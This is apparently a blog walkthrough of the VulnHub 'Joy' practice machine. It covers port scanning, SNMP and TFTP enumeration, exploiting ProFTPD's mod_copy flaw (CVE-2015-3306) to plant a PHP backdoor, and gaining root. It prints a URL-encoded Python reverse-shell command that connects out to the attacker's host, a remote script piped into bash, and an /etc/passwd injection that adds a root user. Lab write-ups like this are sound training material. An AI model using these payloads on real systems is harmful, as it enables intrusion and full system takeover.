DIGITALWORLD.LOCAL JOY Walkthrough — VulnHub- No Handshakes for Old Protocol— OSCP Practice
Joy is an OSCP like machine from DIGITALWORLD.LOCAL series that has some important lessons to teach, we will dig deeper in enumeration and network protocols and find out how we can dig deeper and take advantage of information that might not be on the surface but surely available to us.
Joy at first look might seem hard but as soon as we continue scanning and digging depper it pours out much joyful information to learn and use to solve it.
Preparation
- Download Joy from VulnHub and bootup in VMware or Virtualbox
- Your favorite haxor env, in this article I am using a Kali VM
- Find IP address of Development one way to do it is with namp
nmap -sn 192.168.1.0/24In this case my IP is 192.168.1.183
Tools
- nmap
- nc
- python
- ftp
- OpenSSL
Topics
- då 21
- Continue manual walk arounds when tools won’t return results!
- UDP Scan
- SNMP
- Understanding a FTP exploit in python
- passwd injection
Enumeration
Starting with good ol’ nmap scan!
sudo nmap -sC -sV -T4 -v -O 192.168.1.183 -o nmapResult (snipped)
Nmap scan report for JOY.wlan (192.168.1.183)
Host is up (0.00084s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp ProFTPD
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| drwxrwxr-x 2 ftp ftp 4096 Jan 6 2019 download
|_drwxrwxr-x 2 ftp ftp 4096 Jan 10 2019 upload
22/tcp open ssh Dropbear sshd 0.34 (protocol 2.0)
25/tcp open smtp Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
| ssl-cert: Subject: commonName=JOY
| Subject Alternative Name: DNS:JOY
| Issuer: commonName=JOY
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2018-12-23T14:29:24
| Not valid after: 2028-12-20T14:29:24
| MD5: 9a80 5234 0ef3 1fdd 8f77 16fe 09ee 5b7b
|_SHA-1: 4f02 9a1c 1f41 2ec9 c0df 4523 b1f4 a480 25f9 0165
|_ssl-date: TLS randomness does not represent time
80/tcp open http Apache httpd 2.4.25
| http-ls: Volume /
| SIZE TIME FILENAME
| - 2016-07-19 20:03 ossec/
|_
| http-methods:
|_ Supported Methods: POST OPTIONS HEAD GET
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Index of /
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: SASL STLS AUTH-RESP-CODE CAPA RESP-CODES PIPELINING UIDL TOP
|_ssl-date: TLS randomness does not represent time
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: IDLE LITERAL+ SASL-IR Pre-login ENABLE capabilities IMAP4rev1 more have ID LOGINDISABLEDA0001 OK listed STARTTLS LOGIN-REFERRALS post-login
|_ssl-date: TLS randomness does not represent time
445/tcp open netbios-ssn Samba smbd 4.5.16-Debian (workgroup: WORKGROUP)
465/tcp open smtp Postfix smtpd
|_smtp-commands: JOY.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8,
...
|_SHA-1: 4f02 9a1c 1f41 2ec9 c0df 4523 b1f4 a480 25f9 0165
|_ssl-date: TLS randomness does not represent time
993/tcp open ssl/imaps?
| ssl-cert: Subject: commonName=JOY/organizationName=Good Tech Pte. ...
|_ssl-date: TLS randomness does not represent time
MAC Address: 00:0C:29:E5:37:DD (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 0.046 days (since Sun Feb 7 19:52:34 2021)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=255 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Hosts: The, JOY.localdomain, 127.0.1.1, JOY; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
...
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-02-07T18:58:17
|_ start_date: N/A
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Feb 7 20:58:47 2021 -- 1 IP address (1 host up) scanned in 45.63 seconds- Right off the bat we got port 21 (proftp) with open anonymous user available
- Port 80 opens a file directory with open ossec web applicaiton googling returns no working exploit for this version
21, it’s ‘b0ut då FTP Stuff
Lets mount ftp cause why not!
curlftpfs 192.168.1.183 ftpdir/ -ouser=anonymous
Next in line is to cat them all!
find . -type f -not -empty -exec cat {} \;
There are alot of jibberish but the file under upload directory content is the list of patrick’s home filderwhich trying to hide something in plain sight with all those hash for file names!
Some names are redflags in this situation version_control, but question is how we can have access to it?!
At this point it feels like a dead end but if we go to the start and check out our nmap we didn’t really scanned the whole spectrum of ports!
There are 65353 ports that can be open either TCP or UDP and we just scanned for the well known TCP ports, there might be something hidden out side nmap’s well known scan range!
Scanning all tcp ports with -p- opetion didn’t get us anything interesting but scan of UDP ports did!
First to make the process faster I started with top 20 UDP ports
sudo nmap -Pn -sU -A --top-ports=20 -v -oN udp.nmap 192.168.1.183The results was massive, the most interesting part was open SNMP protocol
- Read more about SNMP protocol
The open snmp on port 161 leaks great deal of information on running services in this case the tftp service that runs on port 36969 which exposes home directory of patrick.
- Read more about TFTP (Trivial File Transfer Protocol)
Also proftpd that we already connected to it from tcp:21 is visible.
Thats a recipie for disasster and we like it!
lets test it with nc and then connect to it, we cant list file with tftp cause its trivial, but since we know it exposes /home/patrick we take the leap and download the version_control since its the most interesting one!
nc -vu 192.168.1.183 36969
We get to know the version of all those softwares and also ProFTPd running on our favorite port 21!
A simple google brings CVE-2015–3306 which is a remote command execution on mod_copy module in ProFTPD 1.3.5. This is huge we can copy stuff around remotely.
There is a python exploit for it
https://github.com/t0kx/exploit-CVE-2015-3306The exploit needs us to provide the webroot form the version_control we know it changed to
/var/www/tryingharderisjoyBy looking closer at the exploit we can see how it works
https://github.com/t0kx/exploit-CVE-2015-3306/blob/master/exploit.py#L23
- on line 23 it echo the result of passthru from
cmdparameter - on line 24 using /proc/self/cmdline using the buggy mod_copy copies the payload , cpfr it to line 26
- on line 26 we see cpto /tmp/
- and in the end on lines 28 adn 30 cpfr and cpto to the webroot in backdoor.php that can be accessible from /backdoor.php
- you can see an example of the usage on line 40 with /backdoor.php?cmd=whoami
This script using sock.send automates the usage of mod_copy, we can do it manually too.
Lets run the exploit adn get the shell.
python3 exploit.py --host 192.168.1.183 --port 21 --path "/var/www/tryingharderisjoy"
and a test
Trying different shells from highon.coffee
The python one is working
http://192.168.1.183/backdoor.php?cmd=python%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.1.105%22,4444));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);%20os.dup2(s.fileno(),2);p=subprocess.call([%22/bin/sh%22,%22-i%22]);%27
Our user is www-data we need to gain to patrick or root directly.
Enumeration scripts like Linux Smart Enumeration didn’t reveal anything interesting so it feels a bit of dead end but making a deep breath and moving around file directory specially the one we dropped into /var/www/tryingharderisjoy just by ls can give us what we need.
Patrick’s creds is literally in front of our face
Also check out local.txt on root to learn a lesson!
With patrick account lets enumerate again
bash <(wget -q -O - https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh) -l2 -iAnd yes sudo -l reveals a script called test that has permission to run with sudo withouth password
by running it we understand that its a bash script to change permission of files in the folder but we can inject different files with filesystem path, cant edit the file itself tho so the fastest way is to change permission of /etc/passwd and add a new root user.
- Using OpesSSL to create a passwd salted hash
- Then forming the passwd line
- Then append it to passwd
openssl passwd -1 -salt somesalt t00r
echo 'nova:$1$somesalt$zl7ghhyb/ddzu8Jlo.q4b1:0:0::/root/bin/bash' >> /etc/passwd
su nova
We got the root access but this is not the only way to root this machine in hackingarticles.in blog you can read about a way using cpfr and cpto of buggy proFTPD.
By overwriting test script with a new script containing a shell after transfering it with ftp to writable directory (upload) and then using telnet to utilize mode_probe cpfr and cpto, then running it with sudo.
Technically it is a more interesting way but not fastets BUT not all the time the “test script” script with NOPASSWD sudo can change the permission of stuff, so lesson learned!
Post Ecploitation
Walking around file system reveals some funny stuff, make sure to check out folders that you havn’t accessed to with patrick account now that you have root :)
Conclution
I learned alot about how important it is to
- Get back and enumerate if it feels like a dead end
- Look around and check stuff out manually if it feels like a dead end
- The usage of exploits other that initial usage (on foothold section) they might become useful later on for priv esc too!
I hope you enjoyed reading this!
